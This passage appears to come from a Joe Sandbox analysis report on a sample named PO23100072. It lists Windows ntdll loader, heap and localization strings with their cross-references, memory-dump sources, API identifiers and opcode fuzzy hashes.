                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                • API String ID: 0-861424205
                                                                Strings
                                                                • Loading import redirection DLL: '%wZ', xrefs: 01818170
                                                                • LdrpInitializeImportRedirection, xrefs: 01818177, 018181EB
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01818181, 018181F5
                                                                • LdrpInitializeProcess, xrefs: 017DC6C4
                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 018181E5
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017DC6C3
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                • API String ID: 0-475462383
                                                                APIs
                                                                  • Part of subcall function 017E2DF0: LdrInitializeThunk.NTDLL ref: 017E2DFA
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BA3
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0BB6
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D60
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017E0D74
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                • String ID:
                                                                • API String ID: 1404860816-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                Strings
                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017D855E
                                                                • LdrpInitializeProcess, xrefs: 017D8422
                                                                • @, xrefs: 017D8591
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 017D8421
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018121D9, 018122B1
                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018122B6
                                                                • SXS: %s() passed the empty activation context, xrefs: 018121DE
                                                                • .Local, xrefs: 017D28D8
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                Strings
                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01813456
                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01813437
                                                                • RtlDeactivateActivationContext, xrefs: 01813425, 01813432, 01813451
                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0181342A
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                Strings
                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01800FE5
                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01801028
                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0180106B
                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018010AE
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                Strings
                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0180A992
                                                                • apphelp.dll, xrefs: 017C2462
                                                                • LdrpDynamicShimModule, xrefs: 0180A998
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A9A2
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017B327D
                                                                • HEAP[%wZ]: , xrefs: 017B3255
                                                                • HEAP: , xrefs: 017B3264
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $@
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: FilterFullPath$UseFilter$\??\
                                                                Strings
                                                                • Failed to allocated memory for shimmed module list, xrefs: 0180A10F
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0180A121
                                                                • LdrpCheckModule, xrefs: 0180A117
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                Strings
                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018182DE
                                                                • Failed to reallocate the system dirs string !, xrefs: 018182D7
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 018182E8
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                Strings
                                                                • @, xrefs: 0185C1F1
                                                                • PreferredUILanguages, xrefs: 0185C212
                                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0185C1C5
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                Strings
                                                                • LdrpCheckRedirection, xrefs: 0182488F
                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01824888
                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01824899
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                Strings
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                Strings
                                                                • LdrpInitializationFailure, xrefs: 018220FA
                                                                • Process initialization failed with status 0x%08lx, xrefs: 018220F3
                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01822104
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: ___swprintf_l
                                                                • String ID: #%u
                                                                • API String ID: 48624451-232158463
                                                                Strings
                                                                • LdrResSearchResource Exit, xrefs: 017AAA25
                                                                • LdrResSearchResource Enter, xrefs: 017AAA13
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                • API String ID: 0-4066393604
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: `$`
                                                                • API String ID: 0-197956300
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Legacy$UEFI
                                                                • API String ID: 2994545307-634100481
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @$MUI
                                                                • API String ID: 0-17815947
                                                                Strings
                                                                • kLsE, xrefs: 017A0540
                                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017A063D
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                • API String ID: 0-2547482624
                                                                Strings
                                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 017AA2FB
                                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 017AA309
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                • API String ID: 0-2876891731
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID: InitializeThunk
                                                                • String ID: Cleanup Group$Threadpool!
                                                                • API String ID: 2994545307-4008356553
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: MUI
                                                                • API String ID: 0-1339004836
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: GlobalTags
                                                                • API String ID: 0-1106856819
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .mui
                                                                • API String ID: 0-1199573805
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: EXT-
                                                                • API String ID: 0-1948896318
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryHash
                                                                • API String ID: 0-2202222882
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: #
                                                                • API String ID: 0-1885708031
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: BinaryName
                                                                • API String ID: 0-215506332
                                                                Strings
                                                                • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0182895E
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                • API String ID: 0-702105204
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                                • Instruction ID: 8b6faa3d61cb7bffe2f6e5ec16c2f13c35559ed388bc409c25cd5c6fd987c9db
                                                                • Opcode Fuzzy Hash: baa9ad21d76d6c89cdb78ccefbadce082d659669b9e33d8b504f80faee97a182
                                                                • Instruction Fuzzy Hash: DC32AE71A01209CFDB25CF68C884AAAF7F1FF88310F684669E955EB391D734E941CB90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction ID: 97e43d292e6b0621cb476774175645ac0d2f51d18b30d3f75c71de6a4729ec2c
                                                                • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                • Instruction Fuzzy Hash: 43F17074E0020A9BDB25DF99C994BAEFBF5AF48B10F04812DE902EB354E734E941CB50
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                                • Instruction ID: 74cefc0a1422cf707b425ee100eae59c8c003b51e157a5df0008ddafd1b190b4
                                                                • Opcode Fuzzy Hash: 32174964f5590d01edb3cf1182ce176718a0c86978e9e50f685176539e8d65c4
                                                                • Instruction Fuzzy Hash: 2DD1D471A0060A9BDF15CF69C841AFEB7F1AFC9304F1C8269E955E7241D735EA068B90
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                                • Instruction ID: 6a6d744c21ac7b3df6a6dc737763c1590856ba30b3d24ee5f0211c8b63ce3225
                                                                • Opcode Fuzzy Hash: 081e3b8a41a8db37bb6f3994ea76089ec447e29a2b4dbc439a899333f7c81b0b
                                                                • Instruction Fuzzy Hash: 6DE17871608342CFC715CF28C494A6AFBE0BF89314F598A6DF99987351EB31E905CB92
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                                • Instruction ID: 5f7b8f96c74019fefedfac4daa078a9291025d66b48c0851f4ae4f75437d74e4
                                                                • Opcode Fuzzy Hash: 2d3655cfb39035bed7948cc9f5e30e95b3338b4f629fc40df7f6dd27da2404fd
                                                                • Instruction Fuzzy Hash: A3D1EF71A0020A9BDF14CF68D880ABFF7B5BF55304F14426DEA12DB290EB34E958CB61
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction ID: 3168b28e44b09dbc41e0bd281fe915e0e8d035ce6f4c49b9db724e5c1f7b6eb1
                                                                • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                • Instruction Fuzzy Hash: EBB1A274A00619AFDF26DB98C940AABBBF5FF86304F14445DEA02D7790DB74EA85CB10
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction ID: f5fb7a2338aa8ba4a22fd2ea885475944e8e4d4adc594f179a227b4f7945ba95
                                                                • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                • Instruction Fuzzy Hash: 78B1D73160064AAFDB26DB68C894BBFFBF6AF44304F144599E652D7285DB30DE41CB50
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                                • Instruction ID: 365c54488afc685f2bcca24b2f5e6cb622264f015d7614d835aad79984610b2d
                                                                • Opcode Fuzzy Hash: 7808c39098aeb65b6a082eaafce0b9571fd1745242b2d7b0bf731a3f393630ec
                                                                • Instruction Fuzzy Hash: 90C159742083458FE764CF19C498BABF7E5BF88304F54496DE98987291E774EA08CF92
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                                • Instruction ID: ba244a815379440cc9020d5ba61e917d475edac33734b83dd28a432619332f1a
                                                                • Opcode Fuzzy Hash: 7a2548d46527ea8b3c9f213ff967a20b40c85a7f2cff461934ff1fd53b4892be
                                                                • Instruction Fuzzy Hash: 85B17170A002668BDF65CF68D890BA9F7F5EF44700F1485E9D50AE7385EB309E89CB21
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                                • Instruction ID: 27daead4cbb9c3ef54b4ccc603e27d66b150ea4d87c7334cbaebaf07434c1165
                                                                • Opcode Fuzzy Hash: 557272b72b8bd273bc2d8442a10f694bbd79df09c099395504464a6bdc80beff
                                                                • Instruction Fuzzy Hash: 33A1E531E006599FEB32DB58CC48BADFFA4AB05B14F154169EB01EB2D1DB749E40CB91
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                                • Instruction ID: 2e252fe47a24401ddc723786c5b2cb5dc243eb77ab5f307ff7ff5473ce3ca69b
                                                                • Opcode Fuzzy Hash: c74b10f6d7590026fbf718a0f8d62f3f7f3a7c9743762ed1255a68f5100ee4ba
                                                                • Instruction Fuzzy Hash: 97A10271B006169FDB24CF69C998BAAF7F5FF49318F104029EA05E7285DBB4E911CB50
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                                • Instruction ID: 3b3051312ee83dfd7087bcb1ca103fbc3e4201780476233368473b3c88b756ec
                                                                • Opcode Fuzzy Hash: cc8ee911b3e2cc4f6747877d4430d1d61cc0e5b6003a96554c42d297e710cc29
                                                                • Instruction Fuzzy Hash: 7AA1EC72A04216EFC722DF28C984B6ABBE9FF48744F150928F589DB655D334EE40CB91
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                                • Instruction ID: e2fc196847533b233ca84e1feb3102de72cb428188739bbb4262b9ea311b8977
                                                                • Opcode Fuzzy Hash: 752d2f2a00487b10d37b52e63be5438ca3721ef14497c8ce777c0887e0e16d83
                                                                • Instruction Fuzzy Hash: C0918871D00125AFDB16CF58D884BAEBFB5EF49710F254159EA10EB345E734EE409BA0
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                                • Instruction ID: d347fb7dd2dd8eec16ea0a121ba7dc8e71ccc60dc2e8c91305d7b66f8cd8d252
                                                                • Opcode Fuzzy Hash: ff5ceb06f6376dc51b350d77c21b205f2b7b83d050fafd2459291d5db7aed077
                                                                • Instruction Fuzzy Hash: C7912531A00616CBDB259B58C8C4BF9FBA1EF84714F2540A9F905DB386FB38DA41C791
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                                • Instruction ID: b10ee2e88ea09f28ed10910c084c207982b23d41a7edb48dc2a3d5b2f47a1875
                                                                • Opcode Fuzzy Hash: 90f72882f50ad7940af559e68bd0f55e1dedf7a8b0504fd43787e1f568e42a6d
                                                                • Instruction Fuzzy Hash: 9B815E71A0061A9BDB24CF69C944ABFFBF9FB48700F14852EE555D7641E334E940CBA4
                                                                Memory Dump Source
                                                                • Source File: 00000005.00000002.1660923291.0000000001770000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_5_2_1770000_PO23100072.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                • Instruction ID: 7caa9fab62ad76711b1a7158866fb0912d9c7a4fc7f9e1328bc0f77ba71bcd30
                                                                • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                • Instruction Fuzzy Hash: 20817271A002099FDF1DCF58C890AAEBBBAFF94314F148569D916EB344DB34DA41CB50
